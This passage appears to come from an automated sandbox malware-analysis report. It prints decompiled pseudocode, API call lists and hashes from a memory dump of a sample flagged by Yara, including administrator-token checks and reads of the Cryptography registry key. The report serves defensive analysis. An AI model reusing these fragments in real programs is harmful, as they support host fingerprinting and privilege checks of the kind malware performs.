                                                                                                                                                                                              				long _v24;
                                                                                                                                                                                              				void* _v28;
                                                                                                                                                                                              				union _SID_NAME_USE _v32;
                                                                                                                                                                                              				char _v36;
                                                                                                                                                                                              				char _t21;
                                                                                                                                                                                              				short _t22;
                                                                                                                                                                                              				intOrPtr _t24;
                                                                                                                                                                                              				intOrPtr* _t26;
                                                                                                                                                                                              				intOrPtr* _t42;
                                                                                                                                                                                              				void* _t44;
                                                                                                                                                                                              				intOrPtr _t52;
                                                                                                                                                                                              				void* _t53;
                                                                                                                                                                                              				void* _t54;
                                                                                                                                                                                              				void* _t56;
                                                                                                                                                                                              				intOrPtr _t57;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t54 = _t56;
                                                                                                                                                                                              				_t57 = _t56 + 0xffffffe0;
                                                                                                                                                                                              				_v8 = 0;
                                                                                                                                                                                              				_t21 =  *0x41b0d0; // 0x0
                                                                                                                                                                                              				_v14 = _t21;
                                                                                                                                                                                              				_t22 =  *0x41b0d4; // 0x500
                                                                                                                                                                                              				_v10 = _t22;
                                                                                                                                                                                              				_t24 =  *0x41b0cc; // 0x12
                                                                                                                                                                                              				_t26 =  *0x41b5b0; // 0x41c720
                                                                                                                                                                                              				 *((intOrPtr*)( *_t26))( &_v14, 1, _t24, 0, 0, 0, 0, 0, 0, 0,  &_v28, _t53);
                                                                                                                                                                                              				if(_v28 == 0) {
                                                                                                                                                                                              					return _v8;
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					 *[fs:eax] = _t57;
                                                                                                                                                                                              					_v20 = 0;
                                                                                                                                                                                              					_v24 = 0;
                                                                                                                                                                                              					LookupAccountSidA(0, _v28, 0,  &_v20, 0,  &_v24,  &_v32); // executed
                                                                                                                                                                                              					_t42 =  *0x41b56c; // 0x41c72c
                                                                                                                                                                                              					_t44 =  *((intOrPtr*)( *_t42))(0, _v28,  &_v36,  *[fs:eax], 0x407d16, _t54); // executed
                                                                                                                                                                                              					if(_t44 != 0) {
                                                                                                                                                                                              						_v8 = _v36;
                                                                                                                                                                                              					} else {
                                                                                                                                                                                              						_v8 = 0;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_pop(_t52);
                                                                                                                                                                                              					 *[fs:eax] = _t52;
                                                                                                                                                                                              					_push(E00407D1D);
                                                                                                                                                                                              					return FreeSid(_v28);
                                                                                                                                                                                              				}
                                                                                                                                                                                              			}


                                                                                                                                                                                              APIs
                                                                                                                                                                                              • LookupAccountSidA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?,?,00000000,00407D16), ref: 00407CD9
                                                                                                                                                                                              • CheckTokenMembership.KERNELBASE(00000000,00000000,?), ref: 00407CEC
                                                                                                                                                                                              • FreeSid.ADVAPI32(00000000,00407D1D), ref: 00407D10
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AccountCheckFreeLookupMembershipToken
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1602037265-0
                                                                                                                                                                                              • Opcode ID: 2fd40f1cd6d938c6e5d16d2cd6dc980c4c8d1b789cf8552ef7046a50898a570f
                                                                                                                                                                                              • Instruction ID: 099d520652cb879bdf47a43f009fc20e3076d83f6f5b891ba4a5cda1263a2b72
                                                                                                                                                                                              • Opcode Fuzzy Hash: 2fd40f1cd6d938c6e5d16d2cd6dc980c4c8d1b789cf8552ef7046a50898a570f
                                                                                                                                                                                              • Instruction Fuzzy Hash: 7821A475A04209AFDB41CFA8DC51FEEB7F8EB48700F104466EA14E7290E775AA01DBA5
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 00401870: RtlInitializeCriticalSection.KERNEL32(0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401886
                                                                                                                                                                                                • Part of subcall function 00401870: RtlEnterCriticalSection.KERNEL32(0041C5B4,0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401899
                                                                                                                                                                                                • Part of subcall function 00401870: LocalAlloc.KERNEL32(00000000,00000FF8,0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 004018C3
                                                                                                                                                                                                • Part of subcall function 00401870: RtlLeaveCriticalSection.KERNEL32(0041C5B4,0040192D,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401920
                                                                                                                                                                                              • RtlEnterCriticalSection.KERNEL32(0041C5B4,00000000,004020D8), ref: 00401FA7
                                                                                                                                                                                              • RtlLeaveCriticalSection.KERNEL32(0041C5B4,004020DF), ref: 004020D2
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2227675388-0
                                                                                                                                                                                              • Opcode ID: 0c1c8bb305bbff8ba2aa7aa2b7d32e669c82bb45643f7d7afb35836f5abc82eb
                                                                                                                                                                                              • Instruction ID: 60aaef5d71d1198278099ac2c9ce8b9a20775f5f033974ed56173d7c89f55220
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0c1c8bb305bbff8ba2aa7aa2b7d32e669c82bb45643f7d7afb35836f5abc82eb
                                                                                                                                                                                              • Instruction Fuzzy Hash: DA41CDB1A813019FD714CF29DDC56AABBA1EB59318B24C27FD505E77E1E378A841CB08
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000000,00407C46), ref: 00407C19
                                                                                                                                                                                              • FreeSid.ADVAPI32(00000000,00407C4D), ref: 00407C40
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CheckFreeMembershipToken
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3914140973-0
                                                                                                                                                                                              • Opcode ID: 02d2a01e1651f1c233edb1ebec011e8a64dd2af6dca5e3f4e19433a4a010ba8d
                                                                                                                                                                                              • Instruction ID: aed4e80559fb2a14190837efd407bda22eaf0f983d9af5a1b784dce0b7ff3491
                                                                                                                                                                                              • Opcode Fuzzy Hash: 02d2a01e1651f1c233edb1ebec011e8a64dd2af6dca5e3f4e19433a4a010ba8d
                                                                                                                                                                                              • Instruction Fuzzy Hash: 60214F75A48388BEE701DBA8CC41FAE77FCEB09704F4084B6E610E3291D775AA098759
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000000,00407C46), ref: 00407C19
                                                                                                                                                                                              • FreeSid.ADVAPI32(00000000,00407C4D), ref: 00407C40
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CheckFreeMembershipToken
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3914140973-0
                                                                                                                                                                                              • Opcode ID: 85f5b30b1e39150e1c8e346ace12111ea4b56de602e113dca3c1568075f88dab
                                                                                                                                                                                              • Instruction ID: f84fb7a27dacd8e4143a25a8c882f6f2bfcd0e0861e01e35ab8e7fc80b6cb224
                                                                                                                                                                                              • Opcode Fuzzy Hash: 85f5b30b1e39150e1c8e346ace12111ea4b56de602e113dca3c1568075f88dab
                                                                                                                                                                                              • Instruction Fuzzy Hash: 0A216075A48248BEE701CBA8CC81FAE77F8EB0D704F5084B6F610E36D1D775AA058B59
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 55%
                                                                                                                                                                                              			E00407500(void* __eax, void* __ebx, char __ecx, char __edx, intOrPtr _a4, char _a8) {
                                                                                                                                                                                              				char _v8;
                                                                                                                                                                                              				char _v12;
                                                                                                                                                                                              				int _v16;
                                                                                                                                                                                              				int _v20;
                                                                                                                                                                                              				void* _v24;
                                                                                                                                                                                              				char _v536;
                                                                                                                                                                                              				intOrPtr* _t43;
                                                                                                                                                                                              				intOrPtr* _t52;
                                                                                                                                                                                              				void* _t56;
                                                                                                                                                                                              				intOrPtr _t63;
                                                                                                                                                                                              				void* _t67;
                                                                                                                                                                                              
                                                                                                                                                                                              				_v12 = __ecx;
                                                                                                                                                                                              				_v8 = __edx;
                                                                                                                                                                                              				_t56 = __eax;
                                                                                                                                                                                              				E004040F4( &_v8);
                                                                                                                                                                                              				E004040F4( &_v12);
                                                                                                                                                                                              				_push(_t67);
                                                                                                                                                                                              				_push(0x4075e3);
                                                                                                                                                                                              				_push( *[fs:eax]);
                                                                                                                                                                                              				 *[fs:eax] = _t67 + 0xfffffdec;
                                                                                                                                                                                              				_v20 = 0xfe;
                                                                                                                                                                                              				_v536 = 0;
                                                                                                                                                                                              				if(_a8 != 1) {
                                                                                                                                                                                              					RegOpenKeyExW(_t56, E00403D3C(_v8), 0, 0x20019,  &_v24); // executed
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					_t52 =  *0x41b574; // 0x41c71c
                                                                                                                                                                                              					 *((intOrPtr*)( *_t52))(_t56, E00403D3C(_v8), 0, 0x20119,  &_v24);
                                                                                                                                                                                              				}
                                                                                                                                                                                              				RegQueryValueExW(_v24, E00403D3C(_v12), 0,  &_v16,  &_v536,  &_v20); // executed
                                                                                                                                                                                              				E00403D10(_a4, 0x100,  &_v536);
                                                                                                                                                                                              				_t43 =  *0x41b58c; // 0x41c718
                                                                                                                                                                                              				 *((intOrPtr*)( *_t43))(); // executed
                                                                                                                                                                                              				_t63 = _t56;
                                                                                                                                                                                              				 *[fs:eax] = _t63;
                                                                                                                                                                                              				_push(E004075EA);
                                                                                                                                                                                              				return E00403B98( &_v12, 2);
                                                                                                                                                                                              			}















                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 004040F4: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 00404102
                                                                                                                                                                                              • RegOpenKeyExW.KERNELBASE(80000002,00000000,00000000,00020019,?), ref: 00407582
                                                                                                                                                                                              • RegQueryValueExW.KERNELBASE(?,00000000,00000000,00000001,00000000,000000FE), ref: 004075A9
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AllocOpenQueryStringValue
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 4139485348-0
                                                                                                                                                                                              • Opcode ID: 3ed5b2ee1dba194cc6dbe336fcadb55ada54ae4c4b70a41d90ff88955bf18e37
                                                                                                                                                                                              • Instruction ID: a534eb6d79e9af16e12b264bd48d331209bfd9d9316274433d90d6d6e5d4440a
                                                                                                                                                                                              • Opcode Fuzzy Hash: 3ed5b2ee1dba194cc6dbe336fcadb55ada54ae4c4b70a41d90ff88955bf18e37
                                                                                                                                                                                              • Instruction Fuzzy Hash: 1921C771A04109AFD700EB99CD81EEEBBFCEB48304F504576B904E7691D774AE448A65
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 79%
                                                                                                                                                                                              			E004033F4() {
                                                                                                                                                                                              				struct HINSTANCE__* _t24;
                                                                                                                                                                                              				void* _t32;
                                                                                                                                                                                              				intOrPtr _t35;
                                                                                                                                                                                              				void* _t45;
                                                                                                                                                                                              
                                                                                                                                                                                              				if( *0x0041C650 != 0 ||  *0x41c030 == 0) {
                                                                                                                                                                                              					L3:
                                                                                                                                                                                              					if( *0x41b004 != 0) {
                                                                                                                                                                                              						E004032DC();
                                                                                                                                                                                              						E00403368(_t32);
                                                                                                                                                                                              						 *0x41b004 = 0;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					L5:
                                                                                                                                                                                              					while(1) {
                                                                                                                                                                                              						if( *((char*)(0x41c650)) == 2 &&  *0x41b000 == 0) {
                                                                                                                                                                                              							 *0x0041C634 = 0;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						E004031DC();
                                                                                                                                                                                              						if( *((char*)(0x41c650)) <= 1 ||  *0x41b000 != 0) {
                                                                                                                                                                                              							_t14 =  *0x0041C638;
                                                                                                                                                                                              							if( *0x0041C638 != 0) {
                                                                                                                                                                                              								E00404890(_t14);
                                                                                                                                                                                              								_t35 =  *((intOrPtr*)(0x41c638));
                                                                                                                                                                                              								_t7 = _t35 + 0x10; // 0x0
                                                                                                                                                                                              								_t24 =  *_t7;
                                                                                                                                                                                              								_t8 = _t35 + 4; // 0x400000
                                                                                                                                                                                              								if(_t24 !=  *_t8 && _t24 != 0) {
                                                                                                                                                                                              									FreeLibrary(_t24);
                                                                                                                                                                                              								}
                                                                                                                                                                                              							}
                                                                                                                                                                                              						}
                                                                                                                                                                                              						E004031B4();
                                                                                                                                                                                              						if( *((char*)(0x41c650)) == 1) {
                                                                                                                                                                                              							 *0x0041C64C();
                                                                                                                                                                                              						}
                                                                                                                                                                                              						if( *((char*)(0x41c650)) != 0) {
                                                                                                                                                                                              							E00403338();
                                                                                                                                                                                              						}
                                                                                                                                                                                              						if( *0x41c628 == 0) {
                                                                                                                                                                                              							if( *0x41c018 != 0) {
                                                                                                                                                                                              								 *0x41c018();
                                                                                                                                                                                              							}
                                                                                                                                                                                              							ExitProcess( *0x41b000); // executed
                                                                                                                                                                                              						}
                                                                                                                                                                                              						memcpy(0x41c628,  *0x41c628, 0xb << 2);
                                                                                                                                                                                              						_t45 = _t45 + 0xc;
                                                                                                                                                                                              						0x41b000 = 0x41b000;
                                                                                                                                                                                              					}
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					do {
                                                                                                                                                                                              						 *0x41c030 = 0;
                                                                                                                                                                                              						 *((intOrPtr*)( *0x41c030))();
                                                                                                                                                                                              					} while ( *0x41c030 != 0);
                                                                                                                                                                                              					goto L3;
                                                                                                                                                                                              				}
                                                                                                                                                                                              			}








                                                                                                                                                                                              APIs
                                                                                                                                                                                              • FreeLibrary.KERNEL32(00400000,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000,00402568,?,00403505,?,0041913B,00000000), ref: 00403479
                                                                                                                                                                                              • ExitProcess.KERNEL32(00000000,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000,00402568,?,00403505,?,0041913B,00000000), ref: 004034AE
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExitFreeLibraryProcess
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1404682716-0
                                                                                                                                                                                              • Opcode ID: 8728ad655b3e503d2fdb3a62f9eb409c209a4d433934cda3c6acf7bd146207aa
                                                                                                                                                                                              • Instruction ID: 759013028fc8479fd2dc72d2fd20690e0ff356ad8f398ebd0a8dd26c183a4070
                                                                                                                                                                                              • Opcode Fuzzy Hash: 8728ad655b3e503d2fdb3a62f9eb409c209a4d433934cda3c6acf7bd146207aa
                                                                                                                                                                                              • Instruction Fuzzy Hash: 532162709002408BDB229F6584847577FD9AB49356F2585BBE844AF2C6D77CCEC0C7AD
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 79%
                                                                                                                                                                                              			E004033EC() {
                                                                                                                                                                                              				intOrPtr* _t13;
                                                                                                                                                                                              				struct HINSTANCE__* _t27;
                                                                                                                                                                                              				void* _t36;
                                                                                                                                                                                              				intOrPtr _t39;
                                                                                                                                                                                              				void* _t52;
                                                                                                                                                                                              
                                                                                                                                                                                              				 *((intOrPtr*)(_t13 +  *_t13)) =  *((intOrPtr*)(_t13 +  *_t13)) + _t13 +  *_t13;
                                                                                                                                                                                              				if( *0x0041C650 != 0 ||  *0x41c030 == 0) {
                                                                                                                                                                                              					L5:
                                                                                                                                                                                              					if( *0x41b004 != 0) {
                                                                                                                                                                                              						E004032DC();
                                                                                                                                                                                              						E00403368(_t36);
                                                                                                                                                                                              						 *0x41b004 = 0;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					L7:
                                                                                                                                                                                              					if( *((char*)(0x41c650)) == 2 &&  *0x41b000 == 0) {
                                                                                                                                                                                              						 *0x0041C634 = 0;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					E004031DC();
                                                                                                                                                                                              					if( *((char*)(0x41c650)) <= 1 ||  *0x41b000 != 0) {
                                                                                                                                                                                              						_t17 =  *0x0041C638;
                                                                                                                                                                                              						if( *0x0041C638 != 0) {
                                                                                                                                                                                              							E00404890(_t17);
                                                                                                                                                                                              							_t39 =  *((intOrPtr*)(0x41c638));
                                                                                                                                                                                              							_t7 = _t39 + 0x10; // 0x0
                                                                                                                                                                                              							_t27 =  *_t7;
                                                                                                                                                                                              							_t8 = _t39 + 4; // 0x400000
                                                                                                                                                                                              							if(_t27 !=  *_t8 && _t27 != 0) {
                                                                                                                                                                                              								FreeLibrary(_t27);
                                                                                                                                                                                              							}
                                                                                                                                                                                              						}
                                                                                                                                                                                              					}
                                                                                                                                                                                              					E004031B4();
                                                                                                                                                                                              					if( *((char*)(0x41c650)) == 1) {
                                                                                                                                                                                              						 *0x0041C64C();
                                                                                                                                                                                              					}
                                                                                                                                                                                              					if( *((char*)(0x41c650)) != 0) {
                                                                                                                                                                                              						E00403338();
                                                                                                                                                                                              					}
                                                                                                                                                                                              					if( *0x41c628 == 0) {
                                                                                                                                                                                              						if( *0x41c018 != 0) {
                                                                                                                                                                                              							 *0x41c018();
                                                                                                                                                                                              						}
                                                                                                                                                                                              						ExitProcess( *0x41b000); // executed
                                                                                                                                                                                              					}
                                                                                                                                                                                              					memcpy(0x41c628,  *0x41c628, 0xb << 2);
                                                                                                                                                                                              					_t52 = _t52 + 0xc;
                                                                                                                                                                                              					0x41b000 = 0x41b000;
                                                                                                                                                                                              					goto L7;
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					do {
                                                                                                                                                                                              						 *0x41c030 = 0;
                                                                                                                                                                                              						 *((intOrPtr*)( *0x41c030))();
                                                                                                                                                                                              					} while ( *0x41c030 != 0);
                                                                                                                                                                                              					goto L5;
                                                                                                                                                                                              				}
                                                                                                                                                                                              			}









                                                                                                                                                                                              APIs
                                                                                                                                                                                              • FreeLibrary.KERNEL32(00400000,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000,00402568,?,00403505,?,0041913B,00000000), ref: 00403479
                                                                                                                                                                                              • ExitProcess.KERNEL32(00000000,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000,00402568,?,00403505,?,0041913B,00000000), ref: 004034AE
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExitFreeLibraryProcess
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1404682716-0
                                                                                                                                                                                              • Opcode ID: 12e1264d31eb56f2234adc36a07824a312904d80612c0ba461cf097056190f6f
                                                                                                                                                                                              • Instruction ID: 6a24a9e445b26bd493014d0ae565dbad687ffc3c4e0e672e3f19fd4d116e45a8
                                                                                                                                                                                              • Opcode Fuzzy Hash: 12e1264d31eb56f2234adc36a07824a312904d80612c0ba461cf097056190f6f
                                                                                                                                                                                              • Instruction Fuzzy Hash: 082132709002408FDB229F6584847567FE9AF49316F1585BBE844AE2D6D77CCEC0C799
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 79%
                                                                                                                                                                                              			E004033F0() {
                                                                                                                                                                                              				struct HINSTANCE__* _t26;
                                                                                                                                                                                              				void* _t35;
                                                                                                                                                                                              				intOrPtr _t38;
                                                                                                                                                                                              				void* _t51;
                                                                                                                                                                                              
                                                                                                                                                                                              				if( *0x0041C650 != 0 ||  *0x41c030 == 0) {
                                                                                                                                                                                              					L4:
                                                                                                                                                                                              					if( *0x41b004 != 0) {
                                                                                                                                                                                              						E004032DC();
                                                                                                                                                                                              						E00403368(_t35);
                                                                                                                                                                                              						 *0x41b004 = 0;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					L6:
                                                                                                                                                                                              					if( *((char*)(0x41c650)) == 2 &&  *0x41b000 == 0) {
                                                                                                                                                                                              						 *0x0041C634 = 0;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					E004031DC();
                                                                                                                                                                                              					if( *((char*)(0x41c650)) <= 1 ||  *0x41b000 != 0) {
                                                                                                                                                                                              						_t16 =  *0x0041C638;
                                                                                                                                                                                              						if( *0x0041C638 != 0) {
                                                                                                                                                                                              							E00404890(_t16);
                                                                                                                                                                                              							_t38 =  *((intOrPtr*)(0x41c638));
                                                                                                                                                                                              							_t7 = _t38 + 0x10; // 0x0
                                                                                                                                                                                              							_t26 =  *_t7;
                                                                                                                                                                                              							_t8 = _t38 + 4; // 0x400000
                                                                                                                                                                                              							if(_t26 !=  *_t8 && _t26 != 0) {
                                                                                                                                                                                              								FreeLibrary(_t26);
                                                                                                                                                                                              							}
                                                                                                                                                                                              						}
                                                                                                                                                                                              					}
                                                                                                                                                                                              					E004031B4();
                                                                                                                                                                                              					if( *((char*)(0x41c650)) == 1) {
                                                                                                                                                                                              						 *0x0041C64C();
                                                                                                                                                                                              					}
                                                                                                                                                                                              					if( *((char*)(0x41c650)) != 0) {
                                                                                                                                                                                              						E00403338();
                                                                                                                                                                                              					}
                                                                                                                                                                                              					if( *0x41c628 == 0) {
                                                                                                                                                                                              						if( *0x41c018 != 0) {
                                                                                                                                                                                              							 *0x41c018();
                                                                                                                                                                                              						}
                                                                                                                                                                                              						ExitProcess( *0x41b000); // executed
                                                                                                                                                                                              					}
                                                                                                                                                                                              					memcpy(0x41c628,  *0x41c628, 0xb << 2);
                                                                                                                                                                                              					_t51 = _t51 + 0xc;
                                                                                                                                                                                              					0x41b000 = 0x41b000;
                                                                                                                                                                                              					goto L6;
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					do {
                                                                                                                                                                                              						 *0x41c030 = 0;
                                                                                                                                                                                              						 *((intOrPtr*)( *0x41c030))();
                                                                                                                                                                                              					} while ( *0x41c030 != 0);
                                                                                                                                                                                              					goto L4;
                                                                                                                                                                                              				}
                                                                                                                                                                                              			}








                                                                                                                                                                                              APIs
                                                                                                                                                                                              • FreeLibrary.KERNEL32(00400000,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000,00402568,?,00403505,?,0041913B,00000000), ref: 00403479
                                                                                                                                                                                              • ExitProcess.KERNEL32(00000000,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000,00402568,?,00403505,?,0041913B,00000000), ref: 004034AE
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExitFreeLibraryProcess
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1404682716-0
                                                                                                                                                                                              • Opcode ID: 48b7e33afc810a21c896a39620d19b1e342ee901d510fcbf56cb23baece62cc7
                                                                                                                                                                                              • Instruction ID: 27f7e017d1627fb368da8b77f9887733e34b03074980a547fb73b729214f25e1
                                                                                                                                                                                              • Opcode Fuzzy Hash: 48b7e33afc810a21c896a39620d19b1e342ee901d510fcbf56cb23baece62cc7
                                                                                                                                                                                              • Instruction Fuzzy Hash: A42141709002408BDB229F6584847577FE9AF49316F2585BBE844AE2C6D77CCEC0CB9D
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 65%
                                                                                                                                                                                              			E00406DA8(void* __eax, void* __ebx, char __ecx, char __edx, intOrPtr _a4) {
                                                                                                                                                                                              				char _v8;
                                                                                                                                                                                              				char _v12;
                                                                                                                                                                                              				int _v16;
                                                                                                                                                                                              				int _v20;
                                                                                                                                                                                              				void* _v24;
                                                                                                                                                                                              				char _v536;
                                                                                                                                                                                              				void* _t18;
                                                                                                                                                                                              				intOrPtr _t52;
                                                                                                                                                                                              				void* _t56;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t18 = __eax - 0x55000000;
                                                                                                                                                                                              				_v12 = __ecx;
                                                                                                                                                                                              				_v8 = __edx;
                                                                                                                                                                                              				E004040F4( &_v8);
                                                                                                                                                                                              				E004040F4( &_v12);
                                                                                                                                                                                              				_push(_t56);
                                                                                                                                                                                              				_push(0x406e5f);
                                                                                                                                                                                              				_push( *[fs:eax]);
                                                                                                                                                                                              				 *[fs:eax] = _t56 + 0xfffffdec;
                                                                                                                                                                                              				_v20 = 0xfe;
                                                                                                                                                                                              				_v536 = 0;
                                                                                                                                                                                              				RegOpenKeyExW(_t18, E00403D3C(_v8), 0, 0x20119,  &_v24); // executed
                                                                                                                                                                                              				RegQueryValueExW(_v24, E00403D3C(_v12), 0,  &_v16,  &_v536,  &_v20); // executed
                                                                                                                                                                                              				E00403D10(_a4, 0x100,  &_v536);
                                                                                                                                                                                              				_pop(_t52);
                                                                                                                                                                                              				 *[fs:eax] = _t52;
                                                                                                                                                                                              				_push(E00406E66);
                                                                                                                                                                                              				return E00403B98( &_v12, 2);
                                                                                                                                                                                              			}













                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 004040F4: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 00404102
                                                                                                                                                                                              • RegOpenKeyExW.KERNELBASE(80000002,00000000,00000000,00020119,?), ref: 00406E08
                                                                                                                                                                                              • RegQueryValueExW.KERNELBASE(?,00000000,00000000,00000000,00000000,000000FE), ref: 00406E2F
                                                                                                                                                                                                • Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: String$AllocFreeOpenQueryValue
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 967375698-0
                                                                                                                                                                                              • Opcode ID: 42e8ac0eb481dbdee281ab6c948f954a5f7be2f1dbc7aad8dbdbf02e747b1a52
                                                                                                                                                                                              • Instruction ID: d76901b39ac324b957afaa178e8467113ca23e905bfc9c7565385042a447591e
                                                                                                                                                                                              • Opcode Fuzzy Hash: 42e8ac0eb481dbdee281ab6c948f954a5f7be2f1dbc7aad8dbdbf02e747b1a52
                                                                                                                                                                                              • Instruction Fuzzy Hash: 4E110A71600209AFD700EB99C991ADEBBFCEB48304F504176B504E3291D774AF048AA5
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 65%
                                                                                                                                                                                              			E00406DAC(void* __eax, void* __ebx, char __ecx, char __edx, intOrPtr _a4) {
                                                                                                                                                                                              				char _v8;
                                                                                                                                                                                              				char _v12;
                                                                                                                                                                                              				int _v16;
                                                                                                                                                                                              				int _v20;
                                                                                                                                                                                              				void* _v24;
                                                                                                                                                                                              				char _v536;
                                                                                                                                                                                              				void* _t44;
                                                                                                                                                                                              				intOrPtr _t51;
                                                                                                                                                                                              				void* _t55;
                                                                                                                                                                                              
                                                                                                                                                                                              				_v12 = __ecx;
                                                                                                                                                                                              				_v8 = __edx;
                                                                                                                                                                                              				_t44 = __eax;
                                                                                                                                                                                              				E004040F4( &_v8);
                                                                                                                                                                                              				E004040F4( &_v12);
                                                                                                                                                                                              				_push(_t55);
                                                                                                                                                                                              				_push(0x406e5f);
                                                                                                                                                                                              				_push( *[fs:eax]);
                                                                                                                                                                                              				 *[fs:eax] = _t55 + 0xfffffdec;
                                                                                                                                                                                              				_v20 = 0xfe;
                                                                                                                                                                                              				_v536 = 0;
                                                                                                                                                                                              				RegOpenKeyExW(_t44, E00403D3C(_v8), 0, 0x20119,  &_v24); // executed
                                                                                                                                                                                              				RegQueryValueExW(_v24, E00403D3C(_v12), 0,  &_v16,  &_v536,  &_v20); // executed
                                                                                                                                                                                              				E00403D10(_a4, 0x100,  &_v536);
                                                                                                                                                                                              				_pop(_t51);
                                                                                                                                                                                              				 *[fs:eax] = _t51;
